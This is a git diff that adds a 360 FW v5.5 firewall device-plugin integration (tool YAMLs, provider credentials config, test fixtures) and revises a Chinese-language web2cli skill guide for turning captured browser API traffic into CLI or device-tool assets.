+        - fw_protect_policy_enable_update
+        - fw_vsys_create
+        - fw_vsys_update
+        - fw_vsys_delete
+        - fw_policy_call
+        - test
+    name:
+      type: string
+      description: 策略或对象名称。
+    id:
+      type: integer
+      description: 策略 ID。
+    protocol:
+      type: integer
+      description: 协议族，通常 1 表示 IPv4。
+    enable:
+      type: integer
+      enum: [0, 1]
+      description: 启用状态。
+    method:
+      type: string
+      enum: [GET, POST, PUT, DELETE]
+    path:
+      type: string
+    query:
+      type: object
+    body:
+      type: string
+      description: 完整 JSON payload 字符串。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: policy
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_system.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_system.yaml
new file mode 100644
index 000000000..b6e092998
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_system.yaml
@@ -0,0 +1,48 @@
+name: 360_fw_system
+description: >
+  360 FW v5.5 系统与基础状态工具。用于登录检测、系统信息、接口/HA/授权/NTP/syslog
+  等系统类只读查询。
+category: custom
+enabled: true
+requires_confirmation: false
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: 系统类操作名称。
+      enum:
+        - fw_check_login
+        - fw_system_info_get
+        - fw_interface_list
+        - fw_interface_get
+        - fw_ha_config_get
+        - fw_ha_config_syn_get
+        - fw_ha_status_all_get
+        - fw_lte_config_get
+        - fw_lte_info_get
+        - fw_loopback_list
+        - fw_ntp_config_get
+        - fw_v0_0_1_ntp_config_get
+        - fw_ntp_key_get
+        - fw_syslog_server_get
+        - fw_v0_0_1_syslog_server_get
+        - fw_log_filter_get
+        - fw_fw_policy_config_get
+        - fw_license_config_get
+        - fw_virtual_route_list
+        - fw_diagnose_get
+        - test
+    name:
+      type: string
+      description: 接口名称等查询条件。
+    query:
+      type: object
+      description: 附加查询参数。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: system
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_vpn_bgp.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_vpn_bgp.yaml
new file mode 100644
index 000000000..df69fd0b1
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_vpn_bgp.yaml
@@ -0,0 +1,85 @@
+name: 360_fw_vpn_bgp
+description: >
+  360 FW v5.5 VPN、隧道状态与 BGP 工具。BGP 子接口需要先满足 bgp_info
+  节点前置条件；现有生产 BGP 节点不应作为临时写入对象。
+category: custom
+enabled: true
+requires_confirmation: true
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: VPN/BGP 操作名称。
+      enum:
+        - fw_autoike_list
+        - fw_autoike_create
+        - fw_autoike_delete
+        - fw_phase2ike_create
+        - fw_phase2ike_delete
+        - fw_ipsec_policy_list
+        - fw_ipsec_policy_create
+        - fw_ipsec_policy_delete
+        - fw_ikesa_list
+        - fw_ipsecsa_list
+        - fw_tunnel_status_table
+        - fw_tunnel_status_line
+        - fw_bgp_info_get
+        - fw_bgp_info_create
+        - fw_bgp_info_delete
+        - fw_bgp_network_list
+        - fw_bgp_network_create
+        - fw_bgp_network_delete
+        - fw_bgp_peer_group_list
+        - fw_bgp_peer_group_create
+        - fw_bgp_peer_group_delete
+        - fw_bgp_neighbors_list
+        - fw_bgp_neighbors_create
+        - fw_bgp_neighbors_delete
+        - fw_bgp_access_list_list
+        - fw_bgp_access_list_create
+        - fw_bgp_access_list_delete
+        - fw_bgp_filter_list_list
+        - fw_bgp_filter_list_create
+        - fw_bgp_filter_list_delete
+        - fw_bgp_route_map_list
+        - fw_bgp_route_map_create
+        - fw_bgp_route_map_delete
+        - fw_bgp_map_list_list
+        - fw_bgp_map_list_create
+        - fw_bgp_map_list_delete
+        - fw_bgp_prefix_list_list
+        - fw_bgp_prefix_list_create
+        - fw_bgp_prefix_list_delete
+        - fw_bgp_prefix_policy_list
+        - fw_bgp_prefix_policy_create
+        - fw_bgp_prefix_policy_delete
+        - fw_bgp_import_check_update
+        - fw_bgp_reflector_switch_update
+        - fw_bgp_timer_update
+        - fw_bgp_route_reflector_create
+        - fw_bgp_route_reflector_delete
+        - fw_vpn_bgp_call
+        - test
+    name:
+      type: string
+    ip_vrf_name:
+      type: string
+      description: 虚拟路由器名称，默认 default。
+    method:
+      type: string
+      enum: [GET, POST, PUT, DELETE]
+    path:
+      type: string
+    query:
+      type: object
+    body:
+      type: string
+      description: 完整 JSON payload 字符串。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: vpn_bgp
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/_provider.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/_provider.yaml
new file mode 100644
index 000000000..58770439b
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/_provider.yaml
@@ -0,0 +1,51 @@
+name: "360_fw"
+vendor: "360"
+service_id: "360_fw"
+version: "5.5"
+integration_type: device
+description: >
+  360 FW v5.5 device integration. This plugin adapts the A-series FW RESTful API
+  to Flocks device tools, including system status, objects, policies, network,
+  VPN/BGP, authentication, observability, and documented raw REST calls.
+description_cn: >
+  360 FW v5.5 防火墙设备接入。按 A 系列 FW RESTful API 文档适配，支持系统状态、
+  对象、策略、网络、VPN/BGP、认证、安全对象、监控观测以及官方 REST 接口调用。
+auth:
+  type: custom
+  flow: login_then_authorization_header
+  login_path: /API/login
+credential_fields:
+  - key: base_url
+    label: 设备 API 地址
+    storage: config
+    config_key: base_url
+    input_type: url
+    default: "https://YOUR_360_FW_HOST/API"
+    required: true
+  - key: username
+    label: 用户名
+    storage: secret
+    config_key: username
+    secret_id: 360_fw_v5_5_username
+    input_type: text
+    required: true
+  - key: password
+    label: 密码
+    storage: secret
+    config_key: password
+    secret_id: 360_fw_v5_5_password
+    input_type: password
+    required: true
+defaults:
+  base_url: "https://YOUR_360_FW_HOST/API"
+  timeout: 30
+  category: custom
+  product_version: "5.5"
+  fw_software_version: "V5.5"
+  version_software: "V5.5R605P000B20240625"
+  verify_ssl: false
+notes: |
+  登录使用 POST /API/login，请求体字段为 user/pwd。成功后将响应顶层
+  authorization 字段作为后续请求的 Authorization header 原样传入，不能添加
+  Bearer 前缀。变更类工具通过 Flocks 官方 requires_confirmation 机制触发确认；
+  分析文档明确跳过的高风险接口由 handler 本地拒绝。
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/_test.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/_test.yaml
new file mode 100644
index 000000000..3a9ca0e03
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/_test.yaml
@@ -0,0 +1,121 @@
+schema_version: 1
+provider: 360_fw
+
+connectivity:
+  tool: 360_fw_system
+  params:
+    action: fw_check_login
+
+fixtures:
+  360_fw_system:
+    - label: "Check login"
+      tags: [smoke, auth]
+      params:
+        action: fw_check_login
+      assert:
+        success: true
+    - label: "Get system info"
+      tags: [smoke, system]
+      params:
+        action: fw_system_info_get
+      assert:
+        success: true
+
+  360_fw_objects:
+    - label: "List address objects"
+      tags: [smoke, objects]
+      params:
+        action: fw_addressobj_list
+      assert:
+        success: true
+    - label: "Create temporary address object"
+      tags: [objects, mutation]
+      params:
+        action: fw_addressobj_create
+        name: flocks_tmp_addr
+        addr: 198.18.0.10
+
+  360_fw_policy:
+    - label: "List firewall policies"
+      tags: [smoke, policy]
+      params:
+        action: fw_fwpolicy_list
+      assert:
+        success: true
+    - label: "List policy groups"
+      tags: [policy]
+      params:
+        action: fw_policy_group_list
+
+  360_fw_network:
+    - label: "List interfaces"
+      tags: [smoke, network]
+      params:
+        action: fw_interface_list
+      assert:
+        success: true
+    - label: "List static routes"
+      tags: [network]
+      params:
+        action: fw_static_route_list
+
+  360_fw_vpn_bgp:
+    - label: "List IKE phase1"
+      tags: [smoke, vpn]
+      params:
+        action: fw_autoike_list
+      assert:
+        success: true
+    - label: "Get BGP default node"
+      tags: [bgp]
+      params:
+        action: fw_bgp_info_get
+
+  360_fw_auth_security:
+    - label: "List user groups"
+      tags: [smoke, auth]
+      params:
+        action: fw_user_group_list
+      assert:
+        success: true
+    - label: "List RADIUS servers"
+      tags: [auth]
+      params:
+        action: fw_radius_list
+
+  360_fw_observability:
+    - label: "Get CPU trend"
+      tags: [smoke, observability]
+      params:
+        action: fw_cpu_state
+        type: 1
+        period: 1
+      assert:
+        success: true
+    - label: "Get interface monitor"
+      tags: [observability]
+      params:
+        action: fw_interface_monitor
+
+  360_fw_api_readonly:
+    - label: "Show API catalog"
+      tags: [smoke, api]
+      params:
+        action: fw_api_catalog
+      assert:
+        success: true
+    - label: "Raw GET sys_info"
+      tags: [api]
+      params:
+        action: fw_call_raw_readonly
+        path: /sys_info
+
+  360_fw_api_mutation:
+    - label: "Unified GET sys_info"
+      tags: [api]
+      params:
+        action: fw_call_api
+        method: GET
+        path: /sys_info
+      assert:
+        success: true
diff --git a/.flocks/plugins/skills/web2cli/SKILL.md b/.flocks/plugins/skills/web2cli/SKILL.md
index b5fdc0fc4..9d6b58a9e 100644
--- a/.flocks/plugins/skills/web2cli/SKILL.md
+++ b/.flocks/plugins/skills/web2cli/SKILL.md
@@ -78,6 +78,24 @@ Task Progress:
 - [ ] Step 11: Summarize generated capability and close only the Web2CLI tab
 ```
 
+Copy this checklist and check off items as you complete them:
+
+```text
+Task Progress:
+- [ ] Step 1: Open or create the target browser tab
+- [ ] Step 2: Wait for required manual login or authorization
+- [ ] Step 3: Inject the Web2CLI capture hook and verify it is installed
+- [ ] Step 4: Perform or ask the user to perform the target page operation
+- [ ] Step 5: Export captured API data from window.__capturedRequests
+- [ ] Step 6: Save browser auth state to auth-state.json
+- [ ] Step 7: Analyze captured web APIs and remove unrelated traffic
+- [ ] Step 8: Decide whether the final asset belongs in a skill or device plugin
+- [ ] Step 9: Generate the target implementation, verify.json, and cli-reference.md
+- [ ] Step 10: Validate the generated CLI or device tool with live auth data
+- [ ] Step 11: Integrate the WebCLI capability into long-term skill/device assets
+- [ ] Step 12: Summarize generated capability and close only the Web2CLI tab
+```
+
 ### 1. 打开浏览器或创建 Tab
 
 ```bash
@@ -274,23 +292,27 @@ jq '.[] | select(.method == "POST") | {url: .url, body: .requestBody}' "$CAPTURE
 
 ### 8. 判断最终产物落点
 
-生成任何 CLI、handler 或最终文件前，必须先判断本次 WebCLI 能力最终应该沉淀到哪里。不要先生成一个孤立 CLI，再在后续步骤才决定是否改成 device tool。
+生成任何 CLI、device tool 或最终文件前，必须先判断本次 WebCLI 能力最终应该沉淀到哪里。不要先生成一个孤立 CLI，再在后续步骤才决定是否改成 device tool。
 
 根据用户目标和场景二选一：
 
-- **通用网站、查询脚本、内部系统操作、非设备页接入**：最终主 CLI 放在 skill 的 `scripts/`，按 `references/cli-in-skill.md` 集成为长期维护的 skill / CLI 资产。
-- **安全设备接入、来自设备接入页、需要出现在设备页配置和调用**：最终主实现放在 `tools/device/<plugin_id>/` 下，按 `references/cli-in-device.md` 生成 `_provider.yaml`、工具 YAML 和 handler。CLI 只可作为可选调试/回归入口，不作为设备运行时主路径。
+- **通用网站、查询脚本、内部系统操作、非设备页接入**：最终主 CLI 放在 skill 的 `scripts/`，按 `references/skill-integration.md` 集成为长期维护的 skill / CLI 资产。
+- **安全设备接入、来自设备接入页、需要出现在设备页配置和调用**：最终主实现放在 `tools/device/<plugin_id>/` 下，按 `references/device-tool-requirements.md` 生成 device plugin，并按 `references/skill-integration.md` 补齐 skill 文档入口。CLI 只可作为可选调试/回归入口，不作为设备运行时主路径。
 
 如果用户目标不清楚，先用 `question` 明确最终落点，再继续生成。
 
 ### 9. 按目标落点生成可验证实现
 
+第 8 步确定的最终落点决定主实现形态：**通用 CLI** 和 **device plugin** 二选一。无论选择哪一种，都必须同时完成 skill 集成；区别在于 CLI 场景的 skill 包含 `scripts/` 主脚本，device 场景的 skill 只沉淀文档入口、浏览器经验、认证恢复和 device tool 使用说明，不在 skill 中放置独立 CLI 主实现。
+
+两种场景共用 `$CAPTURE_ROOT/cli-reference.md`，它既可以记录 CLI 用法，也可以记录 device tool 的参数、能力、验证方式和回归方法。
+
 #### 9.1 通用 CLI / Skill 场景
 
-生成前必须读取并遵循：
+选择通用 CLI 作为主实现时，生成前必须读取并遵循：
 
 - `$WEB2CLI_SKILL/references/cli-requirements.md`
-- `$WEB2CLI_SKILL/references/cli-in-skill.md`
+- `$WEB2CLI_SKILL/references/skill-integration.md`
 
 基于抓包结果、认证状态和用户目标，生成 CLI、验证材料和接口文档。阶段性产物至少包含：
 
@@ -300,15 +322,23 @@ jq '.[] | select(.method == "POST") | {url: .url, body: .requestBody}' "$CAPTURE
 
 如果 `CAPTURE_NAME` 包含 `-` 等不能作为 Python 模块名的字符，生成 CLI 文件名时必须规范化为 `_`，例如 `test-domain_cli.py` 应写为 `test_domain_cli.py`。
 
-随后按 `references/cli-in-skill.md` 将主 CLI 集成到 skill 的 `scripts/`，不要把最终 CLI 保留成一次性抓包文件名。
+随后按 `references/skill-integration.md` 将主 CLI 集成到 skill 的 `scripts/`，并补齐 skill 级文档：
+
+- `$HOME/.flocks/plugins/skills/<name>-use/scripts/<name>_cli.py`
+- `$HOME/.flocks/plugins/skills/<name>-use/references/browser-workflow.md`
+- `$HOME/.flocks/plugins/skills/<name>-use/references/cli-reference.md`
+- `$HOME/.flocks/plugins/skills/<name>-use/SKILL.md`
+
+不要把最终 CLI 保留成一次性抓包文件名。
 
 #### 9.2 安全设备接入场景
 
-生成前必须读取并遵循：
+选择 device plugin 作为主实现时，生成前必须读取并遵循：
 
-- `$WEB2CLI_SKILL/references/cli-in-device.md`
+- `$WEB2CLI_SKILL/references/device-tool-requirements.md`
+- `$WEB2CLI_SKILL/references/skill-integration.md`
 
-基于抓包结果、认证状态和用户目标，生成 device 插件目录：
+基于抓包结果、认证状态和用户目标，生成 device 插件目录、验证材料和接口文档。主实现只落到 device plugin：
 
 - `$HOME/.flocks/plugins/tools/device/<plugin_id>/_provider.yaml`
 - `$HOME/.flocks/plugins/tools/device/<plugin_id>/<domain>.yaml`
@@ -316,14 +346,20 @@ jq '.[] | select(.method == "POST") | {url: .url, body: .requestBody}' "$CAPTURE
 - `$CAPTURE_ROOT/${CAPTURE_NAME}_verify.json`
 - `$CAPTURE_ROOT/cli-reference.md`
 
-安全设备接入场景不要求先生成 `$CAPTURE_ROOT/<normalized_capture_name>_cli.py`。如确实需要 CLI 做调试或回归，可生成可选 CLI，但必须明确它不是设备运行时主路径，且不要和 handler 独立演进出两套认证/请求逻辑。
+同时创建或更新对应产品 skill，但该 skill 不应包含 `scripts/` 主 CLI：
+
+- `$HOME/.flocks/plugins/skills/<name>-use/references/browser-workflow.md`
+- `$HOME/.flocks/plugins/skills/<name>-use/references/cli-reference.md`
+- `$HOME/.flocks/plugins/skills/<name>-use/SKILL.md`
+
+device 场景不要求先生成 `$CAPTURE_ROOT/<normalized_capture_name>_cli.py`，也不要在 skill 的 `scripts/` 下放置一份与 device tool 平行演进的 CLI 主实现。如确实需要 CLI 做调试或回归，只能作为 device plugin 目录下的可选辅助文件，并必须明确它不是设备运行时主路径。
 
 ### 10. 验证与修改
 
 根据第 8 步确定的目标落点验证可用性：
 
 - 通用 CLI / Skill 场景：用生成的 CLI 任意选择一个接口调用测试可用性
-- 安全设备接入场景：用生成的 handler/device tool 或可选 CLI 任意选择一个低风险接口调用测试可用性
+- 安全设备接入场景：用生成的 device tool 或可选 CLI 任意选择一个低风险接口调用测试可用性
 - 认证状态可用性
 - `verify.json` 的输出约束是否满足
 - method、endpoint、query/body/payload 的一致性，必要时根据 `${CAPTURE_NAME}_api.json` 调整
@@ -335,17 +371,17 @@ jq '.[] | select(.method == "POST") | {url: .url, body: .requestBody}' "$CAPTURE
 无论主实现放在哪里，都必须保留 skill 级文档入口，供长期维护、认证恢复、重新抓包和排障使用：
 
 - `references/browser-workflow.md` 必须记录浏览器连接检查、登录步骤、state 保存位置和认证恢复流程
-- `references/cli-reference.md` 必须记录 CLI 或 device handler 的能力、参数、验证方式和回归方法
+- `references/cli-reference.md` 必须记录 CLI 或 device tool 的能力、参数、验证方式和回归方法
 - `SKILL.md` 必须说明当前能力最终落点：`scripts/` 或 `tools/device/<plugin_id>/`
 
-注意：skill 文档入口必选，不等于必须把主 CLI 代码也放进 skill 的 `scripts/`。安全设备接入场景下，主实现应以 device handler 为准。
+注意：skill 文档入口必选，不等于必须把主 CLI 代码也放进 skill 的 `scripts/`。安全设备接入场景下，主实现应以 device tool 为准。
 
 不要只停留在一次性 CLI 或临时抓包结果；最终都要沉淀成可长期维护的资产。
 
 ### 12. summary并关闭浏览器 tab
 
-1. 总结当前生成的 CLI 工具有哪些接口/能力
-2. 确保 CLI 可用后关闭浏览器或 Tab
+1. 总结当前生成的 CLI 或 device tool 有哪些接口/能力
+2. 确保生成的主实现可用后关闭浏览器或 Tab
 
 #### 关闭浏览器或 Tab
 
@@ -397,5 +433,6 @@ else:
 - 登录状态失效：重新登录后再次执行保存状态命令。
 
 ## Reference
-- references/cli-in-device.md 在 skill 集成完成后，将 WebCLI 能力进一步封装为 device 插件
-- references/cli-in-skill.md 将生成的 CLI 集成到 skill 中使用
+- references/cli-requirements.md 说明通用 CLI 主实现的生成要求
+- references/device-tool-requirements.md 说明 device tool 主实现的生成要求
+- references/skill-integration.md 说明 CLI 和 device tool 两种主实现如何接入长期维护的产品 skill
diff --git a/.flocks/plugins/skills/web2cli/references/cli-in-skill.md b/.flocks/plugins/skills/web2cli/references/cli-in-skill.md
deleted file mode 100644
index 97687cdb4..000000000
--- a/.flocks/plugins/skills/web2cli/references/cli-in-skill.md
+++ /dev/null
@@ -1,191 +0,0 @@
-# 生成后的 CLI 如何接入 Skill
-
-> 本文只说明一件事：`web2cli` 已经生成出 CLI 之后，怎样把它整理成可长期维护的 skill 资产。
-
-## 命名约定
-
-落到 skill 时，统一改成**稳定的产品名**：
-
-- skill 目录：`$HOME/.flocks/plugins/skills/<name>-use/`
-- CLI 主脚本：`$HOME/.flocks/plugins/skills/<name>-use/scripts/<name>_cli.py`
-- 默认认证状态：`~/.flocks/browser/<name>/auth-state.json`
-
-约定说明：
-
-- `<name>` 用产品或系统的稳定标识，不用一次性任务名
-- 目录名可以保留 `-`，例如 `tdp-use`
-- Python 脚本名统一用 `_`，例如 `tdp_cli.py`
-- 不要把最终 CLI 保留成 `export_data_cli.py`、`test_capture_cli.py` 这类临时名字
-
-## 放到已有产品 Skill
-
-如果仓库里已经有对应产品 skill，直接把生成结果并入现有 skill：
-
-```bash
-SKILL_ROOT="$HOME/.flocks/plugins/skills/<name>-use"
-
-mkdir -p "$SKILL_ROOT/scripts"
-mkdir -p "$HOME/.flocks/browser/<name>"
-
-cp "$CAPTURE_ROOT/<normalized_capture_name>_cli.py" \
-  "$SKILL_ROOT/scripts/<name>_cli.py"
-
-cp "$CAPTURE_ROOT/auth-state.json" \
-  "$HOME/.flocks/browser/<name>/auth-state.json"
-```
-
-然后补齐这几项：
-
-1. 在 `scripts/config.py` 中把认证状态默认值指向 `~/.flocks/browser/<name>/auth-state.json`
-2. 在 `references/cli-reference.md` 中写清楚 CLI 用法、环境变量和示例
-3. 在 `references/browser-workflow.md` 中写清楚浏览器登录、保存 state、页面入口、稳定操作方式、等待条件和认证恢复流程
-4. 在 `SKILL.md` 中说明什么时候优先走 CLI，什么时候退回浏览器
-
-推荐的配置写法：
-
-```python
-import os
-from pathlib import Path
-
-AUTH_STATE_FILE = Path(
-    os.getenv(
-        "<NAME>_AUTH_STATE",
-        Path.home() / ".flocks" / "browser" / "<name>" / "auth-state.json",
-    )
-)
-```
-
-这样做的好处是：
-
-- 默认行为统一，和现有产品 skill 保持一致
-- 允许用户用环境变量覆盖
-- 生成阶段的临时产物和最终长期使用的认证文件分离
-
-## 生成新的 Skill
-
-如果当前仓库里还没有对应产品 skill，就按下面的最小结构创建：
-
-```text
-$HOME/.flocks/plugins/skills/<name>-use/
-├── SKILL.md
-├── scripts/
-│   ├── <name>_cli.py
-│   └── config.py
-└── references/
-    ├── browser-workflow.md
-    └── cli-reference.md
-```
-
-其中 `SKILL.md` 必须遵守 Flocks 的标准 skill 格式：
-
-- 文件开头必须是 YAML frontmatter，第一行必须为 `---`
-- frontmatter 至少包含 `name` 和 `description`
-- `name` 使用稳定的 skill 标识，推荐与目录名一致，例如 `<name>-use`
-- frontmatter 结束后，再写正文标题、触发条件、模式判断和使用说明
-
-最小模板示例：
-
-```md
----
-name: test-use
-description: 用于查询 Test 测试平台数据，支持通过 CLI 快速查询，认证失效时退回浏览器模式。
----
-
-# Test Use
-
-## 触发条件
-
-- 用户提到 Test 平台
-- 用户需要查询 Test 数据
-
-## 模式判断
-
-### CLI 模式（默认）
-
-- 适用于快速查询和批量读取数据
-
-### 浏览器模式
-
-- 适用于需要页面交互、导出或重新登录的场景
-```
-
-不要把 `SKILL.md` 直接写成普通 Markdown 文档，例如下面这种格式是无效的：
-
-```md
-# Test Use
-```
-
-各文件职责：
-
-- `SKILL.md`：定义触发条件、模式判断、总入口说明
-- `scripts/<name>_cli.py`：承载生成并整理后的 CLI 能力
-- `scripts/config.py`：集中管理 `BASE_URL`、`AUTH_STATE_FILE`、超时、SSL 等默认配置
-- `references/browser-workflow.md`：统一写浏览器登录、保存 state、页面入口、具体操作经验、等待条件与认证恢复流程
-- `references/cli-reference.md`：写 CLI 参数、命令示例、常见查询
-
-新 skill 的原则也一样：先把生成的 CLI 改成稳定文件名，再把临时 `auth-state.json` 切换到全局默认位置 `~/.flocks/browser/<name>/auth-state.json`。
-
-## `browser-workflow.md` 写作指南
-
-`references/browser-workflow.md` 是产品 skill 里统一承载浏览器经验的单文件。凡是已经验证、后续还会复用的浏览器操作经验，都应该优先沉淀到这里，而不是散落在临时对话里。
-
-推荐写入以下内容：
-
-- 固定的登录入口、首页、详情页、导出页 URL
-- 已确认某产品的稳定登录的方法
-- 认证失效识别与恢复步骤
-- 已验证表格、筛选器、分页、弹窗、下载、上传、详情展开等操作的稳定路径
-- 已验证某站点特有的等待条件、重渲染行为、虚拟列表、iframe 或 SPA 交互特征
-- 默认 state 路径，例如 `~/.flocks/browser/<name>/auth-state.json`
-- CLI 与浏览器的分工边界，例如“列表查询优先 CLI，详情预览/导出/人工登录走浏览器”
-- 特定操作的成功经验，失败案例（特定操作失败 2 次以上，最终成功的经验）
-- web2cli 过程中的踩坑、注意事项
-
-不要写入：
-
-- cookie、token、密码、短信码、TOTP 等敏感信息
-- 一次性的 `@eN` ref、临时 tab id、临时 selector、像素坐标
-- 本次任务的操作流水账
-
-## 认证失败怎么处理
-
-CLI 调用出现以下情况时，优先按认证失效处理：
-
-- 返回 `401` 或 `403`
-- 返回内容出现 `Unauthorized`、`login`、未登录、无权限
-- `auth-state.json` 已存在，但请求仍然被重定向到登录页
-
-处理原则：
-
-1. 不要无限重试 CLI
-2. 请求用户重新通过浏览器登录
-3. 登录完成后，重新保存认证状态到默认路径
-4. 再重试一次 CLI
-
-默认认证文件路径固定为：
-
-```bash
-~/.flocks/browser/<name>/auth-state.json
-```
-
-保存方式示例：
-
-```bash
-mkdir -p "$HOME/.flocks/browser/<name>"
-
-# agent-browser 模式
-agent-browser state save "$HOME/.flocks/browser/<name>/auth-state.json"
-
-# 或 cdp-direct / flocks browser 模式
-flocks browser state save "$HOME/.flocks/browser/<name>/auth-state.json"
-```
-
-如果用户重新登录并保存 state 后，CLI 仍然失败，再继续排查：
-
-- `BASE_URL` 是否写错
-- 当前账号是否确实有接口权限
-- 站点是否还有额外 header / token / csrf 依赖
-
-## 一句话原则
-
-`web2cli` 产出的 `<capture_name>_cli.py` 是临时结果；真正沉淀到 skill 时，要改成稳定产品名脚本，并把认证状态统一落到 `~/.flocks/browser/<name>/auth-state.json`。
diff --git a/.flocks/plugins/skills/web2cli/references/device-tool-requirements.md b/.flocks/plugins/skills/web2cli/references/device-tool-requirements.md
new file mode 100644
index 000000000..fd1f2658a
--- /dev/null
+++ b/.flocks/plugins/skills/web2cli/references/device-tool-requirements.md
@@ -0,0 +1,281 @@
+# Web2CLI Device Tool 生成要求
+
+> 本文说明：`web2cli` 已经抓到页面请求后，怎样生成可在设备页识别、配置和调用的 device tool。
+
+## 结论
+
+`device-tool-requirements.md` 说明安全设备场景下如何生成 device plugin 主实现。它不是 `skill-integration.md` 的替代物，也不要求先生成一套独立 CLI 再额外封装 device：
+
+- 所有 `web2cli` 结果都必须完成 skill 集成
+- 安全设备接入场景下，主实现是 `device plugin`，不是 skill `scripts/` 下的 CLI
+- 对应 skill 必须保留 `SKILL.md`、`references/browser-workflow.md` 和 `references/cli-reference.md`，用于记录触发条件、浏览器经验、认证恢复、device tool 能力和验证方法
+- `references/cli-reference.md` 是通用接口文档入口，可记录 CLI，也可记录 device tool 的参数、输出和回归方式
+
+## 何时使用
+
+在以下场景调用本文档：
+
+- 当前任务明确来自“设备接入”页面，目标是把某个安全设备或安全产品接入到设备管理体系
+- 最终产物需要出现在设备页，并允许用户填写实例配置、刷新模板、按 `device_id` 调用
+- 当前 WebCLI 抓到的能力属于安全设备能力，而不是单纯给 skill 复用的站点操作脚本
+
+不优先使用本文档的场景：
+
+- 只是想保留一个可复用 CLI 供 agent 在 skill 中调用
+- 目标不是设备接入，而是某个通用网站的操作自动化、查询脚本或内部工具
+- 暂时只需要沉淀浏览器经验、CLI 参数和认证恢复流程，不需要设备页识别
+
+如果当前任务来自“设备接入”页面，并且目标是安全设备接入，WebCLI 应生成标准 device 插件作为主实现：
+
+```text
+$HOME/.flocks/plugins/tools/device/<plugin_id>/
+├── _provider.yaml
+├── <domain>.yaml
+├── <name>.handler.py
+├── <name>_cli.py        # 可选，仅用于调试/回归
+└── _test.yaml           # 可选，最小验证样例
+```
+
+其中：
+
+- `_provider.yaml`：决定设备页是否能识别该模板，以及用户创建实例时需要填写哪些字段
+- `<domain>.yaml`：定义可调用工具、参数和 action
+- `<name>.handler.py`：设备运行时入口，负责读取配置、认证、发请求、清洗结果
+- `<name>_cli.py`：只作为调试入口保留，不作为设备运行时主路径
+
+认证默认规则：
+
+- 自定义 CLI / WebCLI 默认认证方式为 `cookie/auth-state`：优先复用浏览器保存的 `auth-state.json`，从中按请求域名/path/secure 规则选择 Cookie，并在需要时读取 localStorage
+- 默认认证状态文件：`~/.flocks/browser/<name>/auth-state.json`
+- 优先使用 `auth_state_path` 指向 `~/.flocks/browser/<name>/auth-state.json`
+- 可以额外暴露可选 `username` / `password`，但它们只用于 cookie 失效后的认证恢复，不替代默认的 `auth_state_path`
+- 不要生成或使用 `auth_state_json` / `Legacy Auth State JSON` 这类内联 JSON 字段；设备配置只保存 state 文件路径，不粘贴 state 文件内容
+- 只有在目标站点确实还依赖额外字段时，才补充 `cookie`、`csrf_token`、`access_token` 或特定认证头；这些字段是 `auth_state_path` 之外的补充，不替代默认的 cookie/auth-state
+- 不要把 `cookie` 或 `token` 设计成和 `auth-state` 并列的多个默认入口；如果用户提供的是 state 文件路径，必须写入 `auth_state_path`
+
+## 命名约定
+
+- 插件目录：`$HOME/.flocks/plugins/tools/device/<plugin_id>/`
+- `plugin_id`：推荐使用稳定产品名加版本，例如 `<name>_v1_0_0`
+- `service_id`：推荐使用稳定能力标识，例如 `<name>_device`
+- handler 文件：`<name>.handler.py`
+- 可选 CLI 文件：`<name>_cli.py`
+
+约定说明：
+
+- `<name>` 用产品或系统的稳定标识，不用一次性任务名
+- 目录名可以带版本；`service_id` 要尽量稳定，避免和临时抓包任务绑定
+- Python 文件名统一用 `_`
+
+## 最小 `_provider.yaml`
+
+至少包含以下字段：
+
+```yaml
+name: Acme Portal
+vendor: acme_security
+service_id: acme_portal_device
+version: "1.0.0"
+integration_type: device
+description: >
+  Acme Portal WebCLI-backed device integration for alert listing and asset
+  detail queries. Configure Base URL and the required login state fields
+  separately in the credentials form.
+description_cn: >
+  Acme Portal 的 WebCLI 设备接入模板，支持告警列表和资产详情查询。
+  请在设备配置中分别填写 Base URL 与所需登录态字段。
+credential_fields:
+  - key: base_url
+    label: Base URL
+    storage: config
+    config_key: base_url
+    input_type: url
+    required: true
+  - key: auth_state_path
+    label: Auth State Path
+    storage: config
+    config_key: auth_state_path
+    input_type: text
+    default: "~/.flocks/browser/acme-portal/auth-state.json"
+  - key: username
+    label: Username
+    storage: config
+    config_key: username
+    input_type: text
+    required: false
+    description: 仅在 cookie 失效后需要 Agent 辅助登录刷新 state 时填写
+  - key: password
+    label: Password
+    storage: secret
+    config_key: password
+    secret_id: acme_portal_password
+    input_type: password
+    required: false
+    description: 仅在 cookie 失效后需要 Agent 辅助登录刷新 state 时填写
+  - key: cookie
+    label: Cookie
+    storage: secret
+    config_key: cookie
+    secret_id: acme_portal_cookie
+    input_type: password
+  - key: csrf_token
+    label: CSRF Token
+    storage: secret
+    config_key: csrf_token
+    secret_id: acme_portal_csrf_token
+    input_type: password
+defaults:
+  timeout: 30
+  category: custom
+notes: |
+  WebCLI 设备建议优先复用稳定隐藏接口，不建议把浏览器自动化作为默认运行时。
+  若返回 401/403、跳转登录页或 CSRF 失效，应先按认证失效处理。
+```
+
+注意：
+
+- 必须包含 `integration_type: device`
+- `description` 用英文，`description_cn` 用中文
+- 只把运行时真正需要用户填写的字段放进 `credential_fields`
+- 不要把真实 cookie、token、密码、auth state JSON 写进插件文件
+- 默认先放 `auth_state_path`，并指向 `~/.flocks/browser/<name>/auth-state.json`；不要添加 `auth_state_json` / `Legacy Auth State JSON`
